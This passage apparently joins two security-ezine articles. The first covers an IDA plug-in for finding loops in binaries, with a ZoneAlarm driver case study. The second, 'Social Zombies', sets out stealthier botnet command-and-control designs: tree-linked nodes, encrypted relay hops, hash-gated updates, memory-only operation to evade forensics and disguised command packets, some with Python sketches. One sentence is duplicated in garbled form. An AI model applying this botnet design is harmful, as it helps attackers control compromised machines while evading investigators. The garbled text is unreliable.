To come up with an algorithm that was robust enough to detect both loops in the
irreducible and reducible loop categories, the author decided to modify the
previous definition of a natural loop. The new definition reads "a loop can
have multiple entry points and at least one link that creates a cycle." This
definition avoids the use of dominators to detect loops in the CFG.
The way this alternative algorithm works is by first making a call to the
is_reference_to(ea_t to, ea_t ref) function. The function is_reference_to will
determine if there is a reference from the ea_t specified by ref to the
parameter to. This check within the loop detection algorithm determines if
there is a backedge or link that would complete a loop. The reason this check
is done first is for speed. If there is no reference that would complete a
loop then there is no reason to call is_path_to, thus preventing unnecessary
calculations. However, if there is a link or backedge, a call to the
overloaded function is_path_to(ea_t from, ea_t to) is used to determine if the
nodes that are being examined can even reach each other. The is_path_to function
simulates all possible code execution conditions by following all possible
edges to determine if the flow of execution could ever reach parameter to when
starting at parameter from. The function is_path_to(ea_t from, ea_t to) returns
one (true) if there is indeed a path from from to to. When both of these
functions return true, it can be deduced that the nodes being examined are
involved in a loop.
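As a plain-graph sketch of this two-step check (Python used for illustration; the real plug-in works on IDA's ea_t addresses and cross-references, and the helper names below merely mirror the ones described above):

```python
def is_reference_to(cfg, to, ref):
    # True if node `ref` has a direct edge to `to` -- the candidate
    # backedge/link that would complete a loop.
    return to in cfg.get(ref, [])

def is_path_to(cfg, frm, to):
    # Follow all possible edges from `frm`; True if execution starting
    # at `frm` could ever reach `to`.
    seen, work = set(), [frm]
    while work:
        n = work.pop()
        if n == to:
            return True
        if n not in seen:
            seen.add(n)
            work.extend(cfg.get(n, []))
    return False

def find_loops(cfg):
    nodes = set(cfg) | {s for succs in cfg.values() for s in succs}
    loops = []
    for a in nodes:
        for b in nodes:
            # Cheap edge check first; only then the costly path search.
            if is_reference_to(cfg, a, b) and is_path_to(cfg, a, b):
                loops.append((a, b))
    return loops

# An irreducible CFG: the cycle B <-> C is reported even though
# no single header dominates it.
cfg = {"A": ["B", "D"], "B": ["C"], "D": ["C"], "C": ["B"]}
```

Note that the nested pair enumeration in find_loops is the source of the O(N^2) running time discussed in the next section.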
4.1) Problems with the New Approach
Every algorithm can have small problems that make it far from optimal, and the
new approach presented above is no exception. The algorithm has not been
optimized for performance: it runs in O(N^2) time, which carries quite a load
if there are more than 600 or so nodes.
The reason the algorithm is so time consuming is that the is_path_to function,
which computes all possible paths to and from a given node, was implemented as
a Depth First Search (DFS) instead of a Breadth First Search (BFS). Depth
First Search is much more expensive than Breadth First Search, and because of
that the algorithm may suffer in some rare cases. If the reader is interested
in implementing a more efficient algorithm for finding dominators, the reader
should check out Advanced Compiler Design and Implementation by Steven S.
Muchnick.
It should be noted that future versions of this plug-in will include
optimizations to the code, specifically a new implementation using a Breadth
First Search instead of the Depth First Search, as well as other small
optimizations.
5) Loop Detection Using IDA Plug-ins
The plug-in described in this document uses the Function Analyzer Class
(functionanalyzer) that was developed by Pedram Amini
(http://labs.idefense.com) as the base class. The Loop Detection
(loopdetection) class uses inheritance to glean its attributes from Function
Analyzer. The reason inheritance is used is primarily for ease of development.
Inheritance is also used so that when a new version of Function Analyzer is
released, the user only has to replace the old file instead of re-adding
functions to it. The final reason inheritance is used is for code conformity,
which is accomplished by creating virtual functions. These virtual functions
allow the user to override methods that are implemented in Function Analyzer.
This means that a user who understands the structure of Function Analyzer
should not have a hard time understanding the structure of the loop detection
class.
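The relationship can be sketched structurally as follows (Python is used for brevity; the real classes are C++, and the method names here are invented for illustration, not taken from the actual plug-in):

```python
class FunctionAnalyzer:
    """Stand-in for Pedram Amini's functionanalyzer base class."""
    def run(self):
        self.results = []
        self.analyze()          # hook, overridable like a C++ virtual method
        return self.results

    def analyze(self):
        self.results.append("enumerate basic blocks")

class LoopDetection(FunctionAnalyzer):
    """Stand-in for the loopdetection class: it inherits the driver and
    extends the overridable hook instead of re-implementing the base."""
    def analyze(self):
        super().analyze()       # reuse everything the base provides
        self.results.append("detect loops")
```

A user who knows how the base class drives its overridable hook can read the derived class immediately, which is the code-conformity point made above.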
5.1) Plug-in Usage
To best utilize this plug-in, the user needs to understand its features and
capabilities. When a user runs the plug-in, they will be prompted with the
window shown in the figure. Each of the options shown there is described
individually below.
Graph Loop
This feature will visualize the loops, marking the entry of a loop with a
green border, the exit of a loop with a red border, and a loop node with a
yellow border.
Highlight Function Calls
This option allows the user to highlight the background of any function call
made within a loop. The highlighting is done within the IDA View.
Output Stack Information
This is a feature that is only enabled with the graph loop option. When this
option is enabled the graph will contain information about the stack of the
function including the variables name, whether or not it is an argument, and
the size of the variable. This option is a great feature for static auditing.
Highlight Code
This option is very similar to Highlight Function Calls, except that instead
of just highlighting function calls within loops, it will highlight all the
code that is executed within the loops. This makes it easier to read the
loops in the IDA View.
Verbose Output
This feature allows the user to see how the program is working and will give
more information about what the plug-in is doing.
Auto Commenting
This option adds comments to loop nodes, such as where the loop begins, where
it exits, and other useful information, so that the user doesn't have to
continually look at the graph.
All Loops Highlighting of Functions
This feature will find every loop within the IDA database. It will then
highlight any call to any function within a loop. The highlighting is done
within the IDA View making navigation of code easier.
All Loops Highlighting of Code
This option will find every loop within the database. It will then highlight
all segments of code involved in a loop. The highlighting of code will allow
for easier navigation of code within the IDA View.
Natural Loops
This detection feature allows the user to only see natural loops. It may not
pick up all loops but is an educational implementation of the previously
discussed algorithm.
Recursive Function Calls
This detection option will allow the user to see where recursive function calls
are located.
5.2) Known Issues
There are a couple of known issues with this plug-in. It does not deal with
rep* instructions, nor does it deal with mov** instructions that might result
in copied buffers. Future versions will deal with these instructions, but
since the plug-in is open source, users can make changes as they see fit.
Another issue is that of ``no-interest'': detecting loops that aren't of
interest or don't pose a security risk. These loops may, for example, be
simple counting loops that don't write to memory. Halvar Flake describes this
topic in his talk given at Black Hat Windows 2004. Feel free to read his
paper and make changes accordingly. The author will also update the plug-in
with these options at a later date.
5.3) Case Study: Zone Alarm
For a case study the author chose Zone Alarm's vsdatant.sys driver. This
driver does a lot of the dirty work for Zone Alarm such as packet filtering,
application monitoring, and other kernel level duties. Some may wonder why it
would be worthwhile to find loops in a driver. In Zone Alarm's case, the user
can hope to find miscalculations in lengths where they didn't convert a signed
to unsigned value properly and therefore may cause an overflow when looping.
Anytime an application takes data in remotely that may be type-casted at some
point, there is always a great chance for loops that overflow their bounds.
When analyzing the Zone Alarm driver, the user needs to select certain options
to get a better idea of what is going on with loops. First, the user should
select Verbose Output and All Loops Highlighting of Functions to see if there
are any dangerous function calls within loops. This is illustrated in the
figure.
After running through the loop detection phase, some interesting results are
found, as shown in the figure.
Visiting the address 0x00011a21 in IDA shows the loop. To begin, the reader
will need to find the loop's entry point, which is at:
.text:00011A1E jz short loc_11A27
At the loop's entry point, the reader will notice:
.text:00011A27 push 206B6444h ; Tag
.text:00011A2C push edi ; NumberOfBytes
.text:00011A2D push 1 ; PoolType
.text:00011A2F call ebp ;ExAllocatePoolWithTag
At this point, the reader can see that every time the loop passes through its
entry point it will allocate memory. To determine if the attacker can cause a
double free error, further investigation is needed.
.text:00011A31 mov esi, eax
.text:00011A33 test esi, esi
.text:00011A35 jz short loc_11A8F
If the memory allocation within the loop fails, the loop terminates correctly.
The next call in the loop is to ZwQuerySystemInformation, which tries to
acquire the SystemProcessAndThreadsInformation.
.text:00011A46 mov eax, [esp+14h+var_4]
.text:00011A4A add edi, edi
.text:00011A4C inc eax
.text:00011A4D cmp eax, 0Fh
.text:00011A50 mov [esp+14h+var_4], eax
.text:00011A54 jl short loc_11A1C
This part of the loop is quite uninteresting. In this segment, the code
increments a counter in eax and loops back while eax is less than 15 (0Fh).
It is obvious that a double free error is not possible in this case because
the user has no control over the loop condition or the data within the loop.
This ends the investigation into a possible double free error.
Above is a good example of how to analyze loops that may be of interest. With
all binary analysis it is important to not only identify dangerous function
calls but to also identify if the attacker can control data that might be
manipulated or referenced within a loop.
6) Conclusion
During the course of this paper, the reader has had a chance to learn about the
different types of loops and some of the methods for detecting them. The
reader has also gotten an in-depth view of the new IDA plug-in released with
this article. Hopefully, when the reader now sees a loop, whether in source
code or in a binary, the reader can explore it and determine whether or not it
poses a security risk.
Bibliography
Tarjan, R. E. 1974. Testing flow graph reducibility. J. Comput. Syst. Sci. 9,
355-365.
Sreedhar, Vugranam, Guang Gao, and Yong-Fong Lee. Identifying loops using DJ
graphs. http://portal.acm.org/citation.cfm?id=236114.236115
Flake, Halvar. Automated Reverse Engineering.
http://www.blackhat.com/presentations/win-usa-04/bh-win-04-flake.pdf
Social Zombies - Aspects of Trojan Networks
May, 2005
warlord / nologin.org
1) Introduction
While I'm sitting here and writing this article, my firewall is
getting hammered by lots and lots of packets that I never asked for.
How come? In the last couple of years we saw the internet grow into
a dangerous place for the uninitiated, with worms and viruses
looming almost everywhere, often times infecting systems without
user interaction. This article will focus on the subclass of malware
commonly referred to as worms, and introduce some new ideas to the
concept of worm networks.
2) Worm Infection Vectors
The worms around today can mostly be put into one of the four categories
discussed in the following sections.
2.1) Mail
The mail worm is the simplest type of worm. Its primary mode of propagation
is social engineering. By sending large quantities of mail with content that
deceives people and/or triggers their curiosity, recipients are tricked into
running an attached program. Once executed, the program will send out copies
of itself via email to recipients found in the victim's address book. This type
of worm is usually stopped quickly when antivirus companies update
their signature files, and mail servers running those AV products
start filtering the worm mails out. Users, in general, are becoming
more and more aware of this type of malware, and many won't run
attachments sent in mail anymore. Regardless, this method of
infection still manages to be successful.
2.2) Browser
Browser-based worms, which primarily target Internet Explorer, make use of
vulnerabilities that exist in web browsers. What generally happens is that
when a user visits a malicious website, an exploit will make Internet
Explorer download and execute code. As
there are well known vulnerabilities in Internet Explorer at all
times that are not yet fixed, the bad guys usually have a couple of
days or weeks to spread their code. Of course, the infection rate
heavily depends on the number of visitors on the website hosting the
exploit. One approach that has been used in the past to gain access
to a wider 'audience' involved sending mail to thousands of users in
an attempt to get the users to visit a malicious website. Another
approach involved hacking advertisement companies and changing their
content in order to make them serve exploits and malware on high
profile sites.
2.3) Peer to Peer
The peer to peer worm is quite similar to the mail worm; it's all about
social engineering. Users hunting for the latest mp3s or pictures of their
most beloved celebrity find similarly named programs and scripts that try to
deceive them into downloading and executing them. Once active on the user's
system, the malcode will make sure it is hosted by the user's p2p application
to spread further. Even if downloaded, host-based anti-virus scanners with
recent signatures will catch most of these programs before they can
be run.
2.4) Active
This one is the most dangerous worm, as it doesn't require any sort
of user interaction at all. It also requires the highest level of
skill to write. Active worms spread by scanning the internet for one
or more types of vulnerabilities. Once a vulnerable target is
found, an exploit attempt is made that, if successful, results in
the uploading of the worm to the attacked site where propagation can
continue in the same form. These worms are usually spotted first by
an increasing number of hosts scanning the internet, most often
scanning for a single port. These worms also usually exploit weaknesses that
have been well known to the public for hours, days, weeks, or months.
Examples of this type of worm include the Wank worm, Code Red, Sadmind, SQL
Slammer, Blaster, Sasser, and others. As the use of firewalls and NAT routers
increases, and as anti-exploit techniques like the ones employed by Windows XP
SP2 become more common, these worms will find fewer hosts to infect. Indeed,
at the time of this writing, it's been a while since the last big active worm
hit the net.
Other active infection vectors include code spreading via unset or weak
passwords on CIFS (the Common Internet File System, the protocol used to
exchange data between Windows hosts via network shares), IRC and instant
messaging networks, Usenet, and virtually every other data exchange protocol.
3) Motives
3.1) Ego
Media attention is often a major motivation behind a worm. Coders frequently
bolster their egos by seeing reports on their worm on major internet sites, as
well as on TV news and in newspapers, with panicked warnings of the latest
doomsday threat that may take down the planet and result in a 'Digital Pearl
Harbor'. Huge media attention usually also means huge law enforcement
attention, and big efforts will be made to catch the perpetrator. Though
wide-open (public) WiFi networks in particular can make it quite difficult to
catch the perpetrator by technological means, people boasting on IRC and, as
in the case of Sasser, bounties can quickly result in the worm's author being
taken into custody.
3.2) DDoS
The reason for a DDoS botnet is usually either the wish to have
enough firepower to virtually shoot people/sites/organizations off
the net, or extortion, or a combination of both. The extortion of
gambling websites before big sports events is just one example of
many cases of extortion involving DDoS. The attacker usually takes
the website down for a couple of hours to demonstrate his ability to
do so whenever it pleases him, and sends a mail to the owner of the
website, asking for money to keep the firepower away from his site.
This sort of business model has been well known for millennia, and has merely
found new applications online.
3.3) Spamming
This one is also about money in the end. Infected machines are (ab)used as
spam zombies, each machine sending its master's unsolicited mail to lots and
lots of unwilling recipients. The owners of these systems usually offer their
services to the spam industry and thus make money from them.
3.4) Adware
Yet another reason involving money. Just as on TV and Google, advertisements
can be sold. The more people who see the advertisement, the more money can be
requested from the people who pay for their slogan to be displayed on some end
user's Windows machine. (Of course, it could be Linux and MacOS too, but,
face it, no adware attacks those.)
3.5) Hacking
A worm that infects and backdoors a couple thousand hosts is a great way to
quickly and easily obtain data from those systems. Examples of data that may
be worth stealing include accounts for online games, credit card numbers,
personal information that can be used in identity theft scams, and more.
There has even been a report of online game items being stolen and later sold
on eBay. Having already compromised one machine, extending influence into a
network can of course be much easier. Take for example the case of a heavily
firewalled company. A hacker can't get inside using an active approach, but
notices that one of his malware-serving websites infected a host within that
network. Using a connect-back approach, where the infected node connects to
the attacker, a tunnel can be built through the firewall, thereby allowing
the attacker to reach the internal network.
4) Botnets
While I did mention DDoS and spam as reasons for infection already,
what I left out so far was the infrastructure of hundreds or
thousands of compromised machines, which is usually called a
botnet. Once a worm has infected lots of systems, an
attacker needs some way to control his zombies. Most often the nodes
are made to connect to an IRC server and join a (password protected)
secret channel. Depending on the malware in use, the attacker can usually
command a single node, or all nodes sitting in the channel, to, for example,
DDoS a host into oblivion, look for game CD keys and dump
those into the channel, install additional software on the infected
machines, or do a whole lot of other operations. While such an
approach may be quite effective, it has several shortcomings.
- IRC is a plaintext protocol.
Unless every node builds an SSL tunnel to an SSL-capable IRCD,
everything that goes on in the channel will be sent from the IRCD to
all nodes connected, which means that someone sniffing from an
infected honeypot can see everything going on in the channel,
including commands and passwords to control the botnet. Such a
weakness allows botnets to be stolen or destroyed (for example, by issuing a
command to make them connect to a new IRCD at IP 127.0.0.1).
- It's a single point of failure.
What if the IRCD goes down because some victim contacted the admin
of the IRC server? On top of this, an IRC Op (an IRC administrator)
could render the channel inaccessible. If an attacker is left
without a way to communicate with all of the zombie hosts, they
become useless.
A way around this dilemma is to make use of dynamic DNS sites like
www.dyndns.org. Instead of making the zombies connect to
irc.somehost.com, the attacker can install a dyndns client which
then allows drones to reference a hostname that can be directed to a
new address by the attacker. This allows the attacker to migrate
zombies from one IRC server to the next without issue. Though this
solves the problem of reliability, IRC should not be considered
secure enough to operate a botnet successfully.
The question, then, is what is a better solution? It seems the
author of the trojan Phatbot already tried to find a way
around this problem. His approach was to include peer to peer
functionality in his code. He ripped the code of the P2P project
``Waste'' and incorporated it into his creation. The problem was,
though, that Waste itself didn't include an easy way to exchange
cryptographic keys that are required to successfully operate the
network, and, as such, neither did Phatbot. The author is not aware
of any case where Phatbot's P2P functionality was actually used.
Then again, considering people won't run around telling everyone
about it (well, not all of them at least), it's possible that such a
case is just not publicly known.
Keeping a botnet up and running requires reliability, authentication, secrecy,
encryption, and scalability. How can all of those goals be achieved? What
would the basic functionality of a perfect botnet require? Consider the
following points:
- An easy way to quickly send commands to all nodes
- Untraceability of the source IP address of a command
- Impossibility of judging from an intercepted command packet which node it was
addressed to
- Authentication schemes to make sure only authorized personnel operate the
zombie network
- Encryption to conceal communication
- Safe software upgrade mechanisms to allow for functionality enhancements
- Containment; so that a single compromised node doesn't endanger the entire
network
- Reliability; to make sure the network is still up and running when most of
its nodes have gone
- Stealthiness on the infected host as well as on the network
At this point one should distinguish between unlinked and
linked, or passive, botnets. Unlinked means each node is on
its own. The nodes poll some central resource for information.
Information can include commands to download software updates, to
execute a program at a certain time, or an order to DDoS a given
target machine. A linked botnet means the nodes don't do anything by
themselves but wait for command packets instead. Both approaches
have advantages and disadvantages. While a linked botnet can react
faster and may be more stealthy considering the fact that it doesn't
build up periodic network connections to look out for commands, it
also won't work for infected nodes sitting behind firewalls. Those
nodes may be able to reach a website to look for commands, which
means an unlinked approach would work for them, but command packets
like in the linked approach won't reach them, as the firewall will
filter those out. Also, consider the case of trying to build up a
botnet with the next Windows worm. Infected Windows machines generally belong
to home users with dynamic IP addresses. End-user machines
change IPs regularly or are turned off because the owner is at work
or on a hunting weekend. Good luck trying to keep an up-to-date list
of infected IPs. So basically, depending on the purpose of the
botnet, one needs to decide which approach to use. A combination of
both might be best. The nodes could, for example, poll a resource of
information once a day, where commands that don't require immediate
attention are waiting for them. On the other hand if there's
something urgent, sending command packets to certain nodes could
still be an option. Imagine a sort of unlinked botnet. No node knows
about another node, nor does it ever contact one of its brothers,
which perfectly achieves our goal of containment. These nodes
periodically contact what the author has labeled a resource
of information to retrieve their latest orders. What could such a
resource look like?
The following attributes are desirable:
- It shouldn't be a single point of failure, like a single host that makes
the whole system break down once it's removed.
- It should be highly anonymous, meaning that connecting to it shouldn't be
suspicious activity. On the contrary, the more people requesting information
from it the better; this way the nodes' connections would vanish in the
masses.
- The system shouldn't be owned by the botnet master. Anonymity is one of the
botnet's primary goals after all.
- It should be easy to post messages there, so that commands to the botnet can
be sent easily.
There are several options to achieve these goals. It could be:
- Usenet: Messages posted to a large newsgroup which contain
steganographically hidden commands that are cryptographically signed
achieves all of the above mentioned goals.
- P2P networks: The nodes link to a server once in a while and, like hundreds
of thousands of other people, search for a certain term (``xxx''), and find
command files. File size could be an indicator for the nodes that a certain
file may be a command file.
- The Web itself: This one would potentially be slow, but of course it's also
possible to setup a website that includes commands, and register that site
with a search engine. To find said site, the zombies would connect to the
search engine and submit a keyword. A special title of the website would
make it possible to identify the right page between thousands of other hits
on the keyword, without visiting each of them.
Using those methods, it would be possible to administer even large botnets
without ever having to know the IP addresses of the nodes. The ``distance''
between botnet owner and botnet drone would be as large as possible, since
there would be no direct connection between the two. These approaches also
face several problems, though:
How would the botnet master determine the number of infected hosts that are up
and running? Only in the case of the website would an estimate of the number
of nodes be possible by inspecting the access logs, and then only if logging
were enabled. In the case of the Usenet approach, a command of ``DDoS
Ebay/Yahoo/Amazon/CNN'' might just reach the last 5 remaining hosts, and the
attacker would be left only with the knowledge that it somehow didn't work; he
would not know the number of zombies that would actually take part in the
attack. The same problem occurs
that would actually take part in the attack. The same problem occurs
with the type and location of the infected hosts. Some might be high
profile, such as those connecting from big corporations, game
developers, or financial institutions. The attacker might be
interested in abusing those for something other than Spam and DDoS,
if he knew about them in particular. If the attacker wants to bounce
his connections over 5 of his compromised nodes to make sure he
can't be traced, then it is required that he be able to communicate
with 5 nodes only and that he must know address information about
the nodes. If the attacker doesn't have a clue which IP addresses
his nodes have, how can he tell 5 of them where to connect to?
And then there's the obvious problem of timing: if the nodes poll for a new
command file once every 24 hours, he'd have to wait up to 24 hours until the
last node finds out it's supposed to bind a port and forward the connection
somewhere else.
4.1) The Linked Network
Though I called this approach a passive network, as the nodes idle
and wait for commands to come to them, this type of botnet is in
fact quite active. The mechanisms described now will not (easily)
work when most of the nodes are on dynamic IP addresses. It is thus
more interesting for nodes installed after exploiting some kind of
server software. Of course, while not solving the uptime problem, a
rogue dyndns account can always give a dynamic IP a static hostname.
This kind of network focuses on all of its nodes forming some kind
of self-organizing peer to peer network. A node that infects some
other host can send over the botnet program and make the new host
link to itself, thus becoming that node's parent. This technique can
make the infected hosts form a sort of tree structure over time, as
each newly infected host tries to link to the infecting host.
Updates, information, and commands can be transmitted using this
worm network to reach each node, no matter which node it was sent
from, as each node informs both child nodes as well as its parent
nodes. In its early (or final) stages, a network of this type might
look like this piece of ascii art:
Level
0            N
            / \
1          N   N
          / \   \
2        N   N   N
To make sure a 'successful' node that infects lots of hosts doesn't become
the parent of all of those hosts, nodes must refuse link requests from child
nodes after a certain number have been linked (say 5). The parent can instead
inform the would-be child to link to one of its already established children.
By keeping track of the number of nodes linked to each location in the tree,
a parent can even try to keep the tree that's hierarchically below it well
balanced. This way a certain node would know about its parent and up
to 5 children, thus keeping the number of other hosts that someone
who compromises a node rather low, while still making sure to have a
network that's as effective as possible. Depending on the number of
nodes in the entire network, the number of children that may link to a parent
node could easily be changed to make the network scale
better. As each node may be some final link as well as a parent
node, every host runs the same program. There's no need for special
'client' and 'server' nodes.
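A minimal sketch of that linking rule (the limit of 5 comes from the description above; everything else, including the balancing choice, is an illustrative assumption, not code recovered from any actual worm):

```python
MAX_CHILDREN = 5  # link limit per parent, as suggested above

class Node:
    def __init__(self, name):
        self.name, self.parent, self.children = name, None, []

    def request_link(self, newcomer):
        # Accept the link only while below the limit ...
        if len(self.children) < MAX_CHILDREN:
            self.children.append(newcomer)
            newcomer.parent = self
            return self
        # ... otherwise redirect the would-be child to the least-loaded
        # existing child, keeping the subtree roughly balanced.
        target = min(self.children, key=lambda c: len(c.children))
        return target.request_link(newcomer)

root = Node("top")
nodes = [Node("n%d" % i) for i in range(7)]
for n in nodes:
    root.request_link(n)
# root keeps 5 direct children; the remaining 2 become grandchildren,
# so no node ever learns of more than MAX_CHILDREN + 1 peers.
```

The redirect-on-full rule is what keeps a highly 'successful' infector from becoming the hub that exposes the whole network.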
What's the problem with a tree structure? Well, what if a parent
fails? Say a node has 3 children, each having 2 children of its own.
Now this node fails because the owner decides to reinstall the host.
Are we left with 3 networks that can't communicate with each other
anymore? Not necessarily. Though this possibly gives a forensics expert
information on additional hosts, to increase reliability each node has to
know about at least one more upstream node that it can try to
link to if its parent is gone. An ideal candidate could be the
parent's parent. In order to make sure that all nodes are still
linked to the network, a periodic (once a day) sort of ``ping''
through the entire network has to happen in any case. By giving a
child node the IP of its ``grandparent'', the direct parent of the
child node always knows that the fail-over node, the one its kids
will try to link to if it should fail, is still up and running.
Though this may help to address the issue of parent death, another
issue remains. If the topmost node fails, there are no more
upstream nodes that the children could link to. That's why in this case the
children should have the IP of one(!) of their siblings as the fail-over
address, so that they can make this one the new top node in the case of a
fail-over condition. Making use of the
node-based ping, each node also knows how many of its children are
still up and running. By including this number into the ping sent to
the parent, the topmost node could always tell the number of linked
hosts. In order to not have to rely on connecting to the topmost
node to collect this type of information, a simple command can be
implemented to make the topmost node report this info to any node on
the network that asks for it. Using a public key stored in all the nodes,
it's even possible to encrypt every piece of information that's destined for
the botnet owner, making sure that no one besides the owner can decrypt the
data. Although this type of botnet may
give a forensics expert or someone with a sniffer information on
other nodes that are part of the network, it also offers fast
response times and more flexibility in the (ab)use of the network
compared to the previous approach with the unlinked nodes. It's a
sort of trade off between the biggest possible level of anonymity on
one hand, and flexibility on the other. It is a huge step up
compared to all of the zombies sitting on IRC servers right now,
where a single channel contains the zombies of the entire botnet. Encrypting
the stored IPs of the child and parent nodes, and keeping those IPs only in
RAM, mitigates the problem further.
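The once-a-day ping with child counts described above amounts to a simple recursive aggregation; a sketch (the class and method names are assumed for illustration):

```python
class Drone:
    def __init__(self, children=()):
        self.children = list(children)

    def ping(self):
        # Answer a parent's ping with 1 (for this node) plus the counts
        # the still-reachable children reported, so totals bubble upward.
        return 1 + sum(child.ping() for child in self.children)

# Topmost node of a tiny example tree: 1 + (1 + 2) + 1 = 5 linked hosts.
top = Drone([Drone([Drone(), Drone()]), Drone()])
```

top.ping() yields the size of the whole network without the topmost node ever holding a list of member IPs.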
Once a drone network of this type has been established with several
hundreds of hosts, there are lots of possibilities of putting it to
use. To conceal the originating IP address of a connection, hopping
over several nodes of the drone network to a target host can be
easily accomplished. A command packet tells one node to bind a port.
Once it receives a connection on it, it is told to command a second
node to do the same, and from then on node 1 forwards all the
traffic to node 2. Node 2 does the same, and forwards to node 3,
then 4, maybe 5, until finally the last node connects to the
intended destination IP. By encrypting the entire connection from
the original source IP address up to the last node, a possible
investigator sniffing node 2 will not see the commands (and thus the
IP addresses) which tell node 3 to connect to node 4, node 4 to node
5, and of course especially not the destination host's address. An
idle timeout makes sure that connections don't stay up forever.
As manually updating several hundreds or thousands of hosts is
tedious work, an easy updating system should be coded into the
nodes. There are basically two possible ways to realize that. A
command, distributed from node to node all over the network, could
make each node replace itself with a newer version which it may
download from a certain HTTP address. The other way is by updating
the server software on one node, which in turn distributes this
update to all the nodes it's linked to (children and
parent), which do just the same. Cryptographic signatures are a must
of course to make sure someone doesn't replace all of the precious
nodes with SETI@home. Vlad902 suggested a simple and effective way
to do that. Each node gets an MD5 hash hardcoded into it. Whenever
someone offers a software update, it will download the first X bytes
and see whether they hash to the hardcoded value. If they do, the
update will be installed. Of course, a forensics expert may extract
the hash out of an identified node. However, due to the nature of
cryptographic hashes, he won't be able to tell which byte sequence
generates that hash. This will prevent the forensics expert from
creating a malicious update to take down the network. As the value
used to generate the hash has to be considered compromised after an
update, each update has to supply a new hash value to look out for.
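Vlad902's check can be sketched in a few lines. The snippet below is an
illustrative Python version, under the assumption that the node hashes the
first X bytes of the offered update and compares the digest with the value
hardcoded at install time; all names are hypothetical.

```python
import hashlib

def update_ok(update_blob, prefix_len, expected_md5_hex):
    # Hash only the first prefix_len bytes of the offered update and
    # compare against the digest hardcoded into the node. Knowing the
    # digest alone does not reveal a byte sequence that produces it,
    # so an analyst cannot forge an accepted update from it.
    return hashlib.md5(update_blob[:prefix_len]).hexdigest() == expected_md5_hex
```

After a successful update, the shipped code would install a fresh digest,
since the old preimage must be considered burned.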
Further security mechanisms could include making the network
completely memory resident, and parents keeping track of kids, and
reinfecting those if necessary. What never hit the hard-disk can
obviously not be found by forensics. Also, commands should be
time-stamped to make sure a certain command will only work once, and
replay attacks (sending a sniffed command packet to trigger a
response from a node) will fail. Using public key cryptography to
sign and encrypt data and communication is always a nice idea too,
but it also has two disadvantages:
- It usually produces quite a big overhead to incorporate into the code.
- Holding the one and only private key matching a public key that's been
found on hundreds of hacked hosts is quite incriminating evidence.
An additional feature could be the incorporation of global unique
identifiers into the network, providing each node with a unique ID
that's set upon installation on each new victim. While the network
master would have to keep track of host addresses and unique IDs, he
could use this feature to his advantage. Imagine a sort of
traceroute within the node network. The master wants to know where a
certain host is linked to. Every node knows the IDs of all of the
child nodes linked hierarchically below it. So he asks the topmost
node to find out the path to the node he's interested in. The
topmost node realizes it's linked somewhere under child 2, and in
turn asks child 2. This node knows it's linked somewhere below child
4, and so on and so on. In the end, the master gets his information,
a couple of IDs, while no node that's not directly linked to another
gets to know the IPs of further hosts that are linked to the
network.
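A rough model of this ID-based traceroute, assuming each node can tell
which child subtree a given ID lives under, might look like the following
Python sketch (class and function names are hypothetical):

```python
class Node:
    # A node knows its own ID and, transitively, the IDs of every
    # node linked hierarchically below it -- but no foreign IPs.
    def __init__(self, node_id):
        self.node_id = node_id
        self.children = []

    def knows(self, target_id):
        # True if target_id sits anywhere below this node.
        return any(c.node_id == target_id or c.knows(target_id)
                   for c in self.children)

def trace(node, target_id):
    # Ask each hop which child subtree the target sits under; the
    # master learns a path of IDs, never additional IP addresses.
    if node.node_id == target_id:
        return [node.node_id]
    for child in node.children:
        if child.node_id == target_id or child.knows(target_id):
            return [node.node_id] + trace(child, target_id)
    return None
```

Each recursion step corresponds to one query hop down the tree, exactly
the "child 2 asks child 4" exchange described above.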
Since a portscan shouldn't reveal a compromised host, a raw socket
must be used to sniff command packets off the wire. Also, command
packets should be structured as unsuspiciously as possible, to make it
look like the host just got hit by yet another packet of ``internet
background noise''. DNS replies or certain values in TCP SYN packets
could do the trick.
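As an illustration only, a node's sniffer might decide whether a captured
UDP payload is a disguised command as sketched below. The magic
transaction-ID scheme is an invented example of the DNS-reply trick, not a
description of any real bot protocol.

```python
import struct

MAGIC_TXID = 0x1337  # hypothetical marker value known only to the nodes

def looks_like_command(udp_payload):
    # A command packet masquerades as a DNS reply: the QR bit is set
    # in the flags word, and the transaction ID carries the marker.
    # Everything else is discarded as ordinary background noise.
    if len(udp_payload) < 12:       # shorter than a DNS header
        return False
    txid, flags = struct.unpack("!HH", udp_payload[:4])
    return bool(flags & 0x8000) and txid == MAGIC_TXID
```

A raw socket would feed every inbound packet through such a filter, so no
listening port is ever visible to a scanner.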
4.2) The Hybrid
There is a way to combine both the anonymity of an unlinked network
with the quick response time of the linked approach. This can be
done by employing a technique first envisioned in the description of
a so-called ``Warhol Worm''. While no node knows anything about
other nodes, the network master keeps track of the IPs of infected
hosts. To distribute a command to a couple or maybe all of the
nodes, he first of all prepares an encrypted file containing the IPs
of all active nodes, and combines that with the command to execute.
He then sends this commandfile to the first node on the list. This
node executes the command, takes itself from the list, and goes top
to bottom through the list, until it finds another active node,
which it transmits the command file to. This way each node will only
get to know about other nodes when receiving commandfiles, which are
subsequently erased after the file has been successfully transmitted
to another node. By calling certain nodes by their unique IDs, it's
even possible to make certain nodes take different actions than all
the others. By preparing different files and sending them to
different nodes at start already, quite a fast distribution time can
be achieved. Of course, should someone manage not only to sniff
the commandfile but also to decrypt it, he has an entire list of
infected hosts. Someone sniffing a node will still also see an
incoming connection from somewhere, and an outgoing connection to
somewhere else, and thus get to know about two more nodes. That's just
the same as depicted in the passive approach. What's different is
that a binary analysis of a node will not divulge information on
another host of the network. As sniffing is probably more of a
threat than binary analysis though, and considering a linked network
offers way more flexibility, the Hybrid is most likely an inferior
approach.
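The commandfile walk can be modeled in a few lines. The following Python
sketch simulates the top-to-bottom scan with a plain list in place of the
real encryption and networking; all names are hypothetical:

```python
def receive_commandfile(my_addr, command, hosts, alive, executed):
    # Each node runs the command, strips itself from the host list,
    # then scans the remainder top to bottom for the next reachable
    # node and hands the shrunken list on. Dead hosts are skipped.
    executed.append((my_addr, command))
    remaining = [h for h in hosts if h != my_addr]
    for nxt in remaining:
        if nxt in alive:
            receive_commandfile(nxt, command, remaining, alive, executed)
            return
```

Note that a node only ever learns the list while it momentarily holds the
commandfile, matching the erase-after-forwarding behavior described above.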
5) Conclusion
When it comes to botnets, malcode development is still in its
infancy, and while today's networks are very basic and easily
detected, the reader should by now have realized that there are far
better and stealthier ways to link compromised hosts into a network.
And who knows, maybe one or more advanced networks are already in
use nowadays, and even though some of their nodes have been spotted
and removed already, the network itself has just not been identified
as being one yet.
Bibliography
The Honeynet Project. Know Your Enemy: Tracking Botnets.
